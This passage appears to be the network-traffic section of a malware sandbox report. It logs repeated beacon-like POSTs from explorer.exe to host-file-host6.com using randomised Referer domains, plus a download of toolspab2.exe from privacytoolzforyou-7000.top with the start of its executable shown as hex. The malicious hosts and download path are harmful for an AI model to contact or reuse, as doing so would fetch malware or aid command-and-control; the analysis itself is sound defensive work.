                                                                                                                                                                                                  Nov 18, 2021 10:30:40.082427025 CET13501INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:40 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  42192.168.2.749815188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:40.217014074 CET13502OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://yeqvyp.org/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 284
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:40.314155102 CET13503INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:40 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  43192.168.2.749816188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:40.515712976 CET13504OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://wcqjtt.net/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 281
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:40.626152039 CET13505INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:40 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  44192.168.2.749817188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:40.713435888 CET13505OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://psltwkawe.net/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 318
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:40.814805031 CET13507INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:40 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  45192.168.2.749818188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:40.919503927 CET13507OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://mpvkqv.com/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 341
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:41.026328087 CET13508INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:40 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  46192.168.2.749819188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:41.143352985 CET13509OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://cxcbx.net/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 361
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:41.262995005 CET13510INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:41 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  47192.168.2.749820188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:41.460762024 CET13511OUTPOST / HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                  Referer: http://iukehj.com/
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Content-Length: 260
                                                                                                                                                                                                  Host: host-file-host6.com
                                                                                                                                                                                                  Nov 18, 2021 10:30:41.571671963 CET13512INHTTP/1.1 404 Not Found
                                                                                                                                                                                                  Server: nginx/1.20.1
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:41 GMT
                                                                                                                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Data Raw: 31 39 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 66 69 6c 65 2d 68 6f 73 74 36 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                  Data Ascii: 197<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-file-host6.com Port 80</address></body></html>0


                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                  5192.168.2.749762188.225.85.12480C:\Windows\explorer.exe
                                                                                                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.439167976 CET1177OUTGET /downloads/toolspab2.exe HTTP/1.1
                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                                  Host: privacytoolzforyou-7000.top
                                                                                                                                                                                                  Nov 18, 2021 10:30:10.609196901 CET1178INHTTP/1.1 200 OK
                                                                                                                                                                                                  Date: Thu, 18 Nov 2021 09:30:10 GMT
                                                                                                                                                                                                  Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.5.38
                                                                                                                                                                                                  Last-Modified: Thu, 18 Nov 2021 09:30:03 GMT
                                                                                                                                                                                                  ETag: "45a00-5d10ccd9fb55d"
                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                  Content-Length: 285184
                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                  Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 30 b4 92 27 74 d5 fc 74 74 d5 fc 74 74 d5 fc 74 1b a3 57 74 5d d5 fc 74 1b a3 62 74 65 d5 fc 74 1b a3 56 74 17 d5 fc 74 7d ad 6f 74 7f d5 fc 74 74 d5 fd 74 fe d5 fc 74 1b a3 53 74 75 d5 fc 74 1b a3 66 74 75 d5 fc 74 1b a3 61 74 75 d5 fc 74 52 69 63 68 74 d5 fc 74 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 04 00 9b 46 0a 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 f2 02 00 00 90 b9 01 00 00 00 00 d0 79 01 00 00 10 00 00 00 10 03 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 bc 01 00 04 00 00 f1 9b 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 14 f4 02 00 78 00 00 00 00 60 bb 01 c0 44 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 bb 01 94 16 00 00 60 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 77 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 10 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8a f0 02 00 00 10 00 00 00 f2 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 c0 4a b8 01 00 10 03 00 00 14 00 00 00 f6 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 c0 44 00 00 00 60 bb 01 00 46 00 00 00 0a 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 18 08 01 00 00 b0 bb 01 00 0a 01 00 00 50 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
